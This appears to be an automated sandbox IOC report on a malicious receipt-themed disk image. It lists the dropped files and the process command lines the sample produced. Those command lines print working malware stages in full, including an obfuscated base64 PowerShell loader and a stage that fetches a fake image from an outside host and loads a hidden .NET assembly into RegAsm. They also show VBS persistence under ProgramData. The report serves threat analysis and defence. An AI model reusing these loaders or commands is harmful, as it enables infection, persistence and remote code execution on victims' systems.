IOC Report
Hapril-29-receipt.img

loading gif

Files

File Path
Type
Category
Malicious
Hapril-29-receipt.img
UDF filesystem data (version 1.5) 'DOCUMENTS'
initial sample
 malicious
C:\ProgramData\lampiro.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
\Device\CdRom1\Hapril-29-receipt.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xfd883c9f, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nDU16UcU[1].txt
Unicode text, UTF-8 text, with very long lines (11140), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0d0st2mh.wkv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1s5o2bkg.lgk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ukcvm5r.nv4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wz3lnap.lsg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au4exap5.etw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei2c2cgm.rlt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ga2hrp2e.fog.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gk3hepqp.tnt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4goklyr.yjg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iuyyn5ag.tu2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5s2ufuf.4ye.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lo3plort.lxg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_micukkxd.ajy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uakobb2k.d3g.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xepax0lv.wte.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z24asuwr.pjm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\Desktop\tmp.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 88
ASCII text, with very long lines (767)
downloaded
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
data
dropped
\Device\Mup\user-PC\PIPE\samr
GLS_BINARY_LSB_FIRST
dropped
\Device\Mup\user-PC\PIPE\wkssvc
GLS_BINARY_LSB_FIRST
dropped
\Device\Mup\MQAWXUY*\MAILSLOT\NET\NETLOGON
data
dropped
There are 22 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "E:\Hapril-29-receipt.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwBwDgTreGEDgTreLwBnDgTreHIDgTrebwDgTreuDgTreGUDgTreYwBuDgTreGUDgTreaQBjDgTreHMDgTrebDgTreBhDgTreG4DgTrebwBpDgTreHQDgTreYQBwDgTreHUDgTreYwBjDgTreG8DgTreagDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBsDgTreGEDgTrebQBwDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/pa/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'lampiro','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\lampiro.vbs"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\lampiro.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\lampiro.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTr